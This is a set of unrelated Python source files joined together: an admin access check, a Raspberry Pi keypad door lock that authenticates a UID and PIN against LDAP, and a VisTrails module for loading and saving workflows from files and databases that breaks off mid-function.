    def checkAccess(self):
        """Denies access if the user is not an org admin."""
        self.check.isProfileActive()
        if self.data.is_org_admin:
            return
        raise AccessViolation(DEF_NOT_ADMIN)

    def components(self):
        """Returns the components that are active on the page."""
        program = self.data.program
        # Midterm and final surveys, once per audience (mentors grade via
        # GradingProjectSurvey, students answer ProjectSurvey).
        mentor_evals = dictForSurveyModel(GradingProjectSurvey, program,
                                          ['midterm', 'final'])
        student_evals = dictForSurveyModel(ProjectSurvey, program,
                                           ['midterm', 'final'])
        components = [
            MentorEvaluationComponent(self.request, self.data, mentor_evals, 0),
            StudentEvaluationComponent(self.request, self.data, student_evals, 1)]
        return components
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
c-lab schloss
Usage:
schloss.py [--theme <theme>]
schloss.py (-h | --help)
schloss.py --version
Options:
-h --help Show this screen.
--version Show version.
--theme=<theme> Sound theme [default: default].
"""
import os
import time
import random
import subprocess
from queue import Queue
from threading import Thread, RLock
from docopt import docopt
from RPi import GPIO
from ldap_interface import authenticate
__version__ = '0.1.0'
GPIO.setwarnings(False)

NUMERIC_KEYS = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
BOUNCE_TIME = 300  # in milliseconds
# NOTE(review): the countdown is decremented once per keypad poll, not per
# millisecond -- confirm the effective debounce duration.
STALE_TIMEOUT = 30  # in seconds

# Per-key debounce countdowns: read_keypad() refuses a key while its counter
# is non-zero, decrease_timeouts() ticks the counters down.
timeouts = {'1': BOUNCE_TIME, '2': BOUNCE_TIME, '3': BOUNCE_TIME, '4': BOUNCE_TIME,
            '5': BOUNCE_TIME, '6': BOUNCE_TIME, '7': BOUNCE_TIME, '8': BOUNCE_TIME,
            '9': BOUNCE_TIME, '0': BOUNCE_TIME, 'A': BOUNCE_TIME, 'B': BOUNCE_TIME,
            'C': BOUNCE_TIME, 'D': BOUNCE_TIME, 'E': BOUNCE_TIME, 'F': BOUNCE_TIME}

# Cross-thread plumbing: keypad_loop() produces key symbols into Q,
# control_loop() consumes them; LOCK serializes keypad scanning with the
# door-opening sequence.
Q = Queue()
LOCK = RLock()

ROWS = [11, 7, 5, 3]    # keypad row pins (driven as outputs), BOARD numbering
COLS = [16, 12, 10, 8]  # keypad column pins (inputs, pulled down)
OPEN_PIN = 15           # drives the door opener
PLAYER = 'aplay'        # external command used to play feedback sounds
MONGO = None            # unused in this file -- presumably wired elsewhere, TODO confirm

# Entry state machine: 0 = waiting, 1 = collecting UID, 2 = collecting PIN.
STATE = 0
UID = ''
PIN = ''
RESET_TIMER = STALE_TIMEOUT  # seconds of inactivity before reset_state()
def next_theme():
    """
    Look into themes folder and find all installed themes. Get a random one
    which is not the current one.

    Fix: the loop condition was inverted (`while THEME != OLD_THEME`), so the
    body never executed and the theme never actually changed. Also guards
    against an infinite loop when fewer than two themes are installed.
    """
    global THEME
    themes = next(os.walk('/opt/raspberrylock/sounds/'))[1]
    if len(themes) < 2:
        # Nothing to rotate to; keep the current theme.
        return
    old_theme = THEME
    while THEME == old_theme:
        THEME = random.choice(themes)
def init_gpios():
    """Configure the GPIO pins: the door relay output plus the keypad matrix."""
    GPIO.setmode(GPIO.BOARD)
    GPIO.setup(OPEN_PIN, GPIO.OUT)
    # Make sure the door opener starts released.
    GPIO.output(OPEN_PIN, 0)
    for pin in ROWS:
        GPIO.setup(pin, GPIO.OUT)
    for pin in COLS:
        GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
def decode_keypad(measurements):
    """Translate a 4x4 keypad scan matrix into the pressed key symbol.

    `measurements` is a list of four row readings, each a list of four
    column values; the first non-zero reading (row-major order) wins.
    Returns None when no key is pressed.
    """
    layout = [['C', 'D', 'E', 'F'], ['B', '9', '6', '3'],
              ['0', '8', '5', '2'], ['A', '7', '4', '1']]
    for row_keys, row_states in zip(layout, measurements):
        for key, pressed in zip(row_keys, row_states):
            if pressed > 0:
                return key
    return None
def decrease_timeouts(timeouts):
    """Tick every positive debounce counter down by one, in place.

    Returns the same dict for convenience.
    """
    for key in timeouts:
        if timeouts[key] > 0:
            timeouts[key] -= 1
    return timeouts
def collect_measurements():
    """Scan the keypad matrix once.

    Drives each row pin high in turn and samples every column pin,
    returning a 4x4 list of 0/1 readings (rows x columns) for
    decode_keypad().
    """
    pin_state = []
    for y_pin in ROWS:
        GPIO.output(y_pin, 1)
        x_pin_states = []
        for x_pin in COLS:
            pin_in = GPIO.input(x_pin)
            # print("{}x{} = {}".format(y_pin, x_pin, pin_in))
            x_pin_states.append(pin_in)
        # Release the row before scanning the next one.
        GPIO.output(y_pin, 0)
        pin_state.append(x_pin_states)
    return pin_state
def read_keypad():
    """Poll the keypad once, debounced.

    Returns the newly pressed key symbol, or None when nothing (new) is
    pressed. On an accepted press, plays a random digit sound as feedback
    (random -- presumably so the sound doesn't reveal the key, TODO
    confirm) and re-arms the per-key debounce counter.
    """
    decrease_timeouts(timeouts)
    key = decode_keypad(collect_measurements())
    if key:
        if timeouts[key] > 0:
            # Still within the debounce window for this key.
            return None
        else:
            num = random.randint(0, 9)
            subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/%s.wav' % (THEME, num)],
                             stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            timeouts[key] = BOUNCE_TIME
            return key
    else:
        return None
def reset_state():
    """Return the entry state machine to its initial 'waiting for UID' state."""
    global STATE, UID, PIN
    print("reset state")
    STATE, UID, PIN = 0, '', ''
def timeout_reset_state():
    """Background thread: reset the entry state after STALE_TIMEOUT idle
    seconds.

    control_loop() re-arms RESET_TIMER on every keypress, so the reset only
    fires when the user walks away mid-entry. Runs forever.
    """
    global RESET_TIMER
    while True:
        RESET_TIMER -= 1
        if RESET_TIMER <= 0:
            reset_state()
            RESET_TIMER = STALE_TIMEOUT
        time.sleep(1.0)
def control_loop():
    """Consume key symbols from Q and drive the UID/PIN entry state machine.

    Runs forever in its own thread.
    """
    global RESET_TIMER
    global STATE, UID, PIN
    reset_state()
    # Main state machine.
    # Expects the user to enter her UID, then PIN like this:
    # [A] 2903 [A] 123456 A
    # The first and second 'A' presses are optional and ignored for compatibility with the replicator.
    # The second 'A' would be mandatory for a non-4-digit UID, luckily all c-base UIDs are 4-digit, though.
    while True:
        key = Q.get()
        # The key itself is masked as '#' -- presumably so PIN digits never
        # end up in the logs; TODO confirm this is intentional.
        print('state={}, got symbol {}'.format(STATE, '#'))
        RESET_TIMER = STALE_TIMEOUT
        Q.task_done()
        if STATE == 0:
            # Waiting: 'A' is an optional prefix, digits start the UID.
            if key == 'A':
                # print('Enter UID:')
                STATE = 0
                continue
            elif key == 'C':
                # 'C' cancels the entry at any point.
                reset_state()
                continue
            elif key in NUMERIC_KEYS:
                UID += key
                STATE = 1
                continue
        elif STATE == 1:
            # Collecting the 4-digit UID; extra digits spill into the PIN.
            if key in NUMERIC_KEYS:
                if len(UID) < 4:
                    UID += key
                    STATE = 1
                else:
                    PIN += key
                    STATE = 2
                continue
            elif key == 'C':
                reset_state()
                continue
            elif key == 'A':
                STATE = 2
                continue
        elif STATE == 2:
            # Collecting the PIN; 'A' submits.
            if key in NUMERIC_KEYS:
                PIN += key
                continue
            elif key == 'C':
                reset_state()
                continue
            elif key == 'A':
                # Authenticate in a separate thread so the keypad stays
                # responsive, then reset for the next user.
                t = Thread(target=open_if_correct, args=(UID, PIN))
                t.start()
                reset_state()
                continue
def open_if_correct(uid, pin):
    """Check the credentials against LDAP and pulse the door opener.

    Runs in its own thread. Holds LOCK so the keypad is not scanned while
    the opener is driven; the trailing sleeps act as a rate limit.
    """
    print('checking ldap ...')
    if authenticate(uid, pin):
        subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/success.wav' % THEME],
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        next_theme()
        with LOCK:
            # Pulse the opener for one second.
            GPIO.output(OPEN_PIN, 1)
            time.sleep(1)
            GPIO.output(OPEN_PIN, 0)
            time.sleep(13)
    else:
        subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/fail.wav' % THEME],
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        with LOCK:
            # Small penalty delay on failed attempts.
            time.sleep(2)
def keypad_loop():
    """Background thread: poll the keypad forever and push pressed keys
    onto Q for control_loop()."""
    while True:
        with LOCK:
            key = read_keypad()
            if key:
                Q.put(key)
def main():
    """Initialize the GPIOs and start the three worker threads.

    Returns immediately after starting the (non-daemon) threads.
    """
    # os.nice(10)
    init_gpios()
    control_thread = Thread(target=control_loop)
    control_thread.start()
    keypad_thread = Thread(target=keypad_loop)
    keypad_thread.start()
    timeout_thread = Thread(target=timeout_reset_state)
    timeout_thread.start()
if __name__ == '__main__':
    args = docopt(__doc__, version=__version__)
    # Fix: THEME was assigned *after* main() had already started the worker
    # threads, so the first keypress could hit a NameError (THEME undefined)
    # in read_keypad()/open_if_correct(). Set it before anything runs.
    THEME = args['--theme']
    try:
        main()
    except KeyboardInterrupt:
        GPIO.cleanup()
| |
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
import base64
import getpass
import os.path
from vistrails.core import get_vistrails_application
from vistrails.core.configuration import get_vistrails_configuration
from vistrails.core.system import vistrails_default_file_type, get_elementtree_library, \
default_connections_file, vistrails_examples_directory, \
vistrails_root_directory
from vistrails.core.external_connection import ExtConnectionList, DBConnection
from vistrails.core.thumbnails import ThumbnailCache
from vistrails.core import debug
from vistrails.db.services.locator import XMLFileLocator as _XMLFileLocator, \
DBLocator as _DBLocator, ZIPFileLocator as _ZIPFileLocator, \
BaseLocator as _BaseLocator, UntitledLocator as _UntitledLocator
from vistrails.db.services.io import SaveBundle, test_db_connection
from vistrails.db import VistrailsDBException
from vistrails.db.domain import DBWorkflow
# Resolve the project's preferred ElementTree implementation once at import
# time; used below by FileLocator.from_link_file to parse .vtl files.
ElementTree = get_elementtree_library()
class BaseLocator(_BaseLocator):
    """Base locator that upgrades db-layer locators to their core classes."""

    @staticmethod
    def convert_locator(locator):
        """Rebrand a db-layer locator in place as its core counterpart."""
        current = locator.__class__
        if current == _DBLocator:
            # DBLocator needs extra per-instance state, so it has its own
            # dedicated converter instead of a plain class swap.
            DBLocator.convert(locator)
        else:
            upgrades = {
                _XMLFileLocator: XMLFileLocator,
                _ZIPFileLocator: ZIPFileLocator,
                _UntitledLocator: UntitledLocator,
            }
            if current in upgrades:
                locator.__class__ = upgrades[current]

    @staticmethod
    def from_url(url):
        """Build a locator from *url* and convert it to a core-layer class."""
        locator = _BaseLocator.from_url(url)
        BaseLocator.convert_locator(locator)
        return locator
class CoreLocator(object):
    """Mixin interface for locators that can interact with the GUI layer."""

    @staticmethod
    def prompt_autosave(parent_widget):
        """Ask the user (via a dialog) whether temporaries should be used."""
        pass

    @staticmethod
    def load_from_gui(parent_widget, obj_type):
        """Open a dialog and return a locator suitable for loading a file."""
        pass

    @staticmethod
    def save_from_gui(parent_widget, obj_type, locator):
        """Open a dialog and return a locator suitable for saving a file."""
        pass

    def update_from_gui(self, klass=None):
        pass

    # FIXME Need to do some more intelligent conversions anywhere this
    # function gets called
    @staticmethod
    def get_convert_klass(vt_type):
        """Map a vtType string to the core class used for db conversion.

        Raises KeyError for unknown vt_type values.
        """
        from vistrails.core.vistrail.vistrail import Vistrail
        from vistrails.core.vistrail.pipeline import Pipeline
        from vistrails.core.log.log import Log
        from vistrails.core.modules.module_registry import ModuleRegistry
        from vistrails.core.log.opm_graph import OpmGraph
        lookup = {
            Vistrail.vtType: Vistrail,
            Pipeline.vtType: Pipeline,
            Log.vtType: Log,
            ModuleRegistry.vtType: ModuleRegistry,
            OpmGraph.vtType: OpmGraph,
        }
        return lookup[vt_type]
class UntitledLocator(_UntitledLocator, CoreLocator):
    """Locator for a vistrail that has not been saved anywhere yet."""

    def load(self, klass=None):
        """Load the untitled object as *klass* (Vistrail by default),
        convert it to the core class and attach this locator to it."""
        from vistrails.core.vistrail.vistrail import Vistrail
        target = Vistrail if klass is None else klass
        loaded = _UntitledLocator.load(self, target.vtType)
        target.convert(loaded)
        loaded.locator = self
        return loaded
class XMLFileLocator(_XMLFileLocator, CoreLocator):
    """Locator for uncompressed .xml vistrail files."""

    def __init__(self, filename, **kwargs):
        _XMLFileLocator.__init__(self, filename, **kwargs)

    def load(self, klass=None):
        """Load the file as *klass* (Vistrail by default), convert the db
        object to the core class and attach this locator to it."""
        from vistrails.core.vistrail.vistrail import Vistrail
        if klass is None:
            klass = Vistrail
        obj = _XMLFileLocator.load(self, klass.vtType)
        klass.convert(obj)
        obj.locator = self
        return obj

    def _do_save(self, obj, do_copy, version=None):
        """Shared implementation for save()/save_as().

        *obj* may be a bare db object or a SaveBundle; the return value has
        the same kind as the input. (This used to be duplicated in both
        methods; the isinstance check replaces the old
        ``type(obj) == type(SaveBundle(None))`` test, which constructed a
        throwaway SaveBundle on every call.)
        """
        is_bundle = isinstance(obj, SaveBundle)
        save_bundle = None
        if is_bundle:
            save_bundle = obj
            obj = save_bundle.get_primary_obj()
        klass = obj.__class__
        # Preserve the exact call shapes of the original save/save_as.
        if do_copy:
            obj = _XMLFileLocator.save(self, obj, True, version)
        else:
            obj = _XMLFileLocator.save(self, obj, False)
        klass.convert(obj)
        obj.locator = self
        if is_bundle:
            return SaveBundle(save_bundle.bundle_type, obj)
        return obj

    def save(self, obj):
        """Save in place (no copy)."""
        return self._do_save(obj, False)

    def save_as(self, obj, version=None):
        """Save to a new copy, optionally at a specific schema *version*."""
        return self._do_save(obj, True, version)

    ##########################################################################

    def __eq__(self, other):
        if not isinstance(other, XMLFileLocator):
            return False
        return self._name == other._name

    ##########################################################################

    @staticmethod
    def prompt_autosave(parent_widget):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_autosave_prompt(parent_widget)

    @staticmethod
    def load_from_gui(parent_widget, obj_type):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)

    @staticmethod
    def save_from_gui(parent_widget, obj_type, locator=None):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
                                                     locator)
class DBLocator(_DBLocator, CoreLocator):
    """Locator for vistrails stored in a database.

    Adds credential prompting (GUI and console) and persistence of
    connection settings via ExtConnectionList on top of the db-layer
    _DBLocator. Passwords are kept in the application key chain, never in
    the saved connections file.
    """

    class getKeyChain(object):
        # Thin proxy over the application-wide key chain so passwords are
        # stored per connection key instead of on disk.
        def set_key(self, key, passwd):
            get_vistrails_application().keyChain.set_key(key,passwd)

        def get_key(self, key):
            return get_vistrails_application().keyChain.get_key(key)

    keyChain = getKeyChain()

    def __init__(self, host, port, database, user, passwd, name=None,
                 **kwargs):
        _DBLocator.__init__(self, host, port, database, user, passwd, name,
                            **kwargs)
        # NOTE: name-mangled to _DBLocator__list; convert() below re-creates
        # this attribute relying on the same mangling.
        self.__list = ExtConnectionList.getInstance(default_connections_file())
        self.ext_connection_id = -1

    def load(self, klass=None):
        """Load *klass* (Vistrail by default) from the database.

        Returns the bare workflow object for DBWorkflow loads; otherwise a
        save bundle whose db objects have been converted to core classes.
        """
        from vistrails.core.vistrail.vistrail import Vistrail
        if klass is None:
            klass = Vistrail
        save_bundle = _DBLocator.load(self, klass.vtType, ThumbnailCache.getInstance().get_directory())
        if klass.vtType == DBWorkflow.vtType:
            # Workflow loads return the object itself, not a bundle.
            wf = save_bundle
            klass = self.get_convert_klass(wf.vtType)
            klass.convert(wf)
            wf.locator = self
            return wf
        for obj in save_bundle.get_db_objs():
            klass = self.get_convert_klass(obj.vtType)
            klass.convert(obj)
            obj.locator = self
        return save_bundle

    def save(self, save_bundle):
        """Save *save_bundle* in place and convert its db objects back to
        core classes."""
        save_bundle = _DBLocator.save(self, save_bundle, False)
        for obj in save_bundle.get_db_objs():
            klass = self.get_convert_klass(obj.vtType)
            klass.convert(obj)
            obj.locator = self
        return save_bundle

    def save_as(self, save_bundle, version=None):
        """Save a copy of *save_bundle*, optionally at schema *version*."""
        save_bundle = _DBLocator.save(self, save_bundle, True, version)
        for obj in save_bundle.get_db_objs():
            klass = self.get_convert_klass(obj.vtType)
            klass.convert(obj)
            obj.locator = self
        # Need to copy images into thumbnail cache directory so references
        # won't become invalid if they are in a temp dir that gets destroyed
        # when the previous locator is closed
        import shutil
        thumb_cache = ThumbnailCache.getInstance()
        thumb_cache_dir = thumb_cache.get_directory()
        new_thumbnails = []
        for thumbnail in save_bundle.thumbnails:
            if os.path.dirname(thumbnail) == thumb_cache_dir:
                new_thumbnails.append(thumbnail)
            else:
                cachedir_thumbnail = os.path.join(thumb_cache_dir, os.path.basename(thumbnail))
                try:
                    shutil.copyfile(thumbnail, cachedir_thumbnail)
                    new_thumbnails.append(cachedir_thumbnail)
                except Exception, e:
                    # Best effort: a thumbnail that cannot be copied is
                    # dropped from the bundle rather than aborting the save.
                    debug.critical("copying %s -> %s failed" % (
                                   thumbnail, cachedir_thumbnail),
                                   e)
        save_bundle.thumbnails = new_thumbnails
        # Need to update thumbnail cache in case some references have changed
        thumb_cache.add_entries_from_files(save_bundle.thumbnails)
        return save_bundle

    def update_from_gui(self, parent_widget, klass=None):
        """Fill in connection info, prompting via a dialog when no stored
        (working) configuration exists. Returns True on success."""
        from vistrails.core.vistrail.vistrail import Vistrail
        import vistrails.gui.extras.core.db.locator as db_gui
        if klass is None:
            klass = Vistrail
        config = self.find_connection_info(self._host, self._port, self._db)
        if config is None or config['succeeded']==False:
            config = db_gui.get_db_connection_from_gui(parent_widget,
                                                       -1,
                                                       "",
                                                       self._host,
                                                       self._port,
                                                       self._user,
                                                       self._passwd,
                                                       self._db)
        if config is not None and config['succeeded'] == True:
            self._host = config['host']
            self._port = config['port']
            self._db = config['db']
            self._user = config['user']
            self._passwd = config['passwd']
            # Persist the (possibly new) connection for future sessions.
            self.ext_connection_id = self.set_connection_info(**config)
            return True
        return False

    def update_from_console(self):
        """Console variant of update_from_gui: prompts for credentials on
        the controlling terminal. Returns True on success."""
        config = self.find_connection_info(self._host, self._port, self._db)
        if config is None:
            # the problem here is if VisTrails is being run through command
            # line from LaTex, stdout is being redirected to a log file, so
            # the user does not see the prompt in raw_input. getpass uses the
            # controlling terminal so it works fine. Just to make sure he sees
            # the first message prompt we will use the controlling terminal
            try:
                f= open('/dev/tty', 'w')
                f.write("\nConnect to db with username [%s]: "%self._user)
                f.close()
                user = raw_input()
            except IOError:
                debug.warning("Couldn't write to terminal. Will try stdout")
                user = raw_input("Connecting to db with username[%s]: "%self._user)
            try:
                if user != '':
                    self._user = user
                passwd = getpass.getpass("password:")
                self._passwd = passwd
                config = {'host': self._host,
                          'port': int(self._port),
                          'user': self._user,
                          'passwd': self._passwd,
                          'db': self._db
                          }
                # Probe the connection before declaring success.
                test_db_connection(config)
                config['succeeded'] = True
                config['name'] = '%s@%s'%(self._user,self._host)
                config['id'] = -1
            except VistrailsDBException, e:
                debug.critical('VisTrails DB Exception', e)
                config['succeeded'] = False
            except Exception, e2:
                debug.critical('VisTrails Exception', e2)
                config['succeeded'] = False
        if config is not None:
            if config['succeeded'] == False:
                # A stored connection exists but did not work: re-prompt for
                # the password only and retry once.
                passwd = getpass.getpass("\nVisTrails DB password for user %s:"%config['user'])
                self._user = config['user']
                self._passwd = passwd
                dbconfig = {'host': self._host,
                            'port': int(self._port),
                            'user': self._user,
                            'passwd': self._passwd,
                            'db': self._db
                            }
                try:
                    test_db_connection(dbconfig)
                    config['succeeded'] = True
                    config['passwd'] = self._passwd
                except VistrailsDBException, e:
                    debug.critical('VisTrails DB Exception', e)
                    config['succeeded'] = False
            if config['succeeded'] == True:
                self._host = config['host']
                self._port = config['port']
                self._db = config['db']
                self._user = config['user']
                self._passwd = config['passwd']
                # Persist the working connection for future sessions.
                self.ext_connection_id = self.set_connection_info(**config)
                return True
            return False
        return False

    def find_connection_info(self, host, port, db):
        """find_connection_info(host:str, port: int, db: str) -> dict
        Returns complete info of a connection with the given parameters,
        or None when no stored connection matches.
        """
        id = self.__list.find_db_connection(host,port,db)
        if id != -1:
            return self.get_connection_info(id)
        else:
            return None

    def get_connection_info(self, id):
        """get_connection_info(id: int) -> dict
        Returns info of ExtConnection """
        conn = self.__list.get_connection(id)
        if conn is not None:
            succeeded = False
            # The password never lives in the connections file; it is
            # fetched from the key chain using a per-connection key.
            key = str(conn.id) + "." + conn.name + "." + conn.host
            passwd = DBLocator.keyChain.get_key(key)
            config = {'host': conn.host,
                      'port': conn.port,
                      'user': conn.user,
                      'passwd': passwd}
            try:
                # Probe so callers know whether the stored info still works.
                test_db_connection(config)
                succeeded = True
            except VistrailsDBException:
                succeeded = False
            config['id'] = conn.id
            config['name'] = conn.name
            config['db'] = conn.database
            config['succeeded'] = succeeded
        else:
            config = None
        return config

    def set_connection_info(self, *args, **kwargs):
        """set_connection_info(id: int, name: str, host: str, port:int,
                               user:str, passwd:str, db:str) -> None
        If the connection exists it will update it, else it will add it
        """
        id = kwargs["id"]
        name = kwargs["name"]
        host = kwargs["host"]
        port = kwargs["port"]
        user = kwargs["user"]
        passwd = kwargs["passwd"]
        db = kwargs["db"]
        # passwd is deliberately blank in the persisted record; the real
        # password goes into the key chain below.
        conn = DBConnection(id=id,
                            name=name,
                            host=host,
                            port=port,
                            user=user,
                            passwd='',
                            database=db,
                            dbtype='MySQL')
        if self.__list.has_connection(id):
            self.__list.set_connection(id,conn)
        else:
            if conn.id == -1:
                conn.id = self.__list.get_fresh_id()
            self.__list.add_connection(conn)
        key = str(conn.id) + "." + conn.name + "." + conn.host
        DBLocator.keyChain.set_key(key,passwd)
        return conn.id

    ##########################################################################

    def __eq__(self, other):
        if type(other) != type(self):
            return False
        return (self._host == other._host and
                self._port == other._port and
                self._db == other._db and
                self._user == other._user and
                #self._name == other._name and
                self._obj_id == other._obj_id and
                self._obj_type == other._obj_type)

    ##########################################################################

    @staticmethod
    def prompt_autosave(parent_widget):
        # DB-backed vistrails always use temporaries; nothing to ask.
        return True

    @staticmethod
    def load_from_gui(parent_widget, obj_type):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_load_db_locator_from_gui(parent_widget, obj_type)

    @staticmethod
    def save_from_gui(parent_widget, obj_type, locator=None):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_save_db_locator_from_gui(parent_widget, obj_type,
                                                   locator)

    @staticmethod
    def from_xml(node, include_name=False):
        locator = _DBLocator.from_xml(node, include_name)
        locator.__class__ = DBLocator
        return locator

    @staticmethod
    def convert(locator):
        """Rebrand a _DBLocator as DBLocator and give it the connection-list
        state that __init__ would normally create."""
        locator.__class__ = DBLocator
        # Written inside the class body, so this mangles to
        # locator._DBLocator__list, matching the attribute set in __init__.
        locator.__list = ExtConnectionList.getInstance(
            default_connections_file())
class ZIPFileLocator(_ZIPFileLocator, CoreLocator):
    """Locator for zipped .vt vistrail bundles."""

    def __init__(self, filename, **kwargs):
        _ZIPFileLocator.__init__(self, filename, **kwargs)

    def _convert_bundle_objs(self, bundle):
        """Convert each db object in *bundle* to its core class and point
        its locator back at self."""
        for db_obj in bundle.get_db_objs():
            core_klass = self.get_convert_klass(db_obj.vtType)
            core_klass.convert(db_obj)
            db_obj.locator = self

    def load(self, klass=None):
        """Load the bundle as *klass* (Vistrail by default)."""
        from vistrails.core.vistrail.vistrail import Vistrail
        target = Vistrail if klass is None else klass
        bundle = _ZIPFileLocator.load(self, target.vtType)
        self._convert_bundle_objs(bundle)
        return bundle

    def save(self, save_bundle):
        """Save in place (no copy)."""
        bundle = _ZIPFileLocator.save(self, save_bundle, False)
        self._convert_bundle_objs(bundle)
        return bundle

    def save_as(self, save_bundle, version=None):
        """Save a copy, optionally at a specific schema *version*."""
        bundle = _ZIPFileLocator.save(self, save_bundle, True, version)
        self._convert_bundle_objs(bundle)
        # Need to update thumbnail cache since files have moved
        ThumbnailCache.getInstance().add_entries_from_files(bundle.thumbnails)
        return bundle

    ##########################################################################

    def __eq__(self, other):
        return (isinstance(other, ZIPFileLocator)
                and self._name == other._name)

    ##########################################################################

    @staticmethod
    def prompt_autosave(parent_widget):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_autosave_prompt(parent_widget)

    @staticmethod
    def load_from_gui(parent_widget, obj_type):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)

    @staticmethod
    def save_from_gui(parent_widget, obj_type, locator=None):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
                                                     locator)
class FileLocator(CoreLocator):
    """Factory locator: dispatches on file extension to XMLFileLocator
    (.xml), a .vtl link-file parse, or ZIPFileLocator (everything else).
    """

    def __new__(self, filename=None, **kwargs):
        # Acts purely as a factory: returns an instance of another locator
        # class — or, with no filename, the *class* matching the default
        # file type — never a FileLocator instance.
        if filename:
            lname = filename.lower()
            if lname.endswith('.xml'):
                return XMLFileLocator(filename, **kwargs)
            elif lname.endswith('.vtl'):
                return FileLocator.from_link_file(filename)
            else:
                return ZIPFileLocator(filename, **kwargs)
        else:
            #return class based on default file type
            if vistrails_default_file_type() == '.vt':
                return ZIPFileLocator
            else:
                return XMLFileLocator

    @staticmethod
    def prompt_autosave(parent_widget):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_autosave_prompt(parent_widget)

    @staticmethod
    def load_from_gui(parent_widget, obj_type):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)

    @staticmethod
    def save_from_gui(parent_widget, obj_type, locator=None):
        import vistrails.gui.extras.core.db.locator as db_gui
        return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
                                                     locator)

    @staticmethod
    def parse(element):
        """ parse(element) -> XMLFileLocator
        Parse an XML (DOM) object representing a locator and returns an
        XMLFileLocator or a ZIPFileLocator object, or None when the element
        is not a file locator or has no name child.
        """
        if str(element.getAttribute('type')) == 'file':
            for n in element.childNodes:
                if n.localName == "name":
                    filename = str(n.firstChild.nodeValue).strip(" \n\t")
                    return FileLocator(filename)
            return None
        else:
            return None

    #ElementTree port
    @staticmethod
    def from_xml(node):
        """from_xml(node:ElementTree.Element) -> XMLFileLocator or None
        Parse an XML object representing a locator and returns a
        XMLFileLocator or a ZIPFileLocator object."""
        if node.tag != 'locator':
            return None
        type_ = node.get('type', '')
        if str(type_) == 'file':
            for child in node.getchildren():
                if child.tag == 'name':
                    # latin-1 round-trips all byte values; filenames are
                    # handled as byte strings here (Python 2).
                    filename = child.text.encode('latin-1').strip()
                    return FileLocator(filename)
            return None

    @staticmethod
    def from_link_file(filename):
        """from_link_file(filename: str) -> DBLocator
        This will parse a '.vtl' file and will create a DBLocator. .vtl files
        are vistrail link files and they are used to point vistrails to open
        vistrails from the database on the web. """
        def convert_from_str(value,type):
            # Convert an attribute string to the requested type. Returns
            # None for missing values and (except for 'str') for empty or
            # whitespace-only strings.
            def bool_conv(x):
                s = str(x).upper()
                if s == 'TRUE':
                    return True
                if s == 'FALSE':
                    return False
            if value is not None:
                if type == 'str':
                    return str(value)
                elif value.strip() != '':
                    if type == 'long':
                        return long(value)
                    elif type == 'float':
                        return float(value)
                    elif type == 'int':
                        return int(value)
                    elif type == 'bool':
                        return bool_conv(value)
                    elif type == 'base64':
                        return base64.b64decode(value)
            return None

        def guess_extension_from_contents(contents):
            # Uncompressed vistrails are XML documents; anything else is
            # assumed to be a zipped .vt bundle.
            if contents.startswith("<vistrail"):
                return ".xml"
            else:
                return ".vt"

        tree = ElementTree.parse(filename)
        node = tree.getroot()
        if node.tag != 'vtlink':
            return None
        #read attributes
        data = node.get('host', None)
        host = convert_from_str(data, 'str')
        data = node.get('port', None)
        port = convert_from_str(data,'int')
        data = node.get('database', None)
        database = convert_from_str(data,'str')
        data = node.get('vtid')
        vt_id = convert_from_str(data, 'int')
        data = node.get('version')
        version = convert_from_str(data, 'str')
        data = node.get('tag')
        tag = convert_from_str(data, 'str')
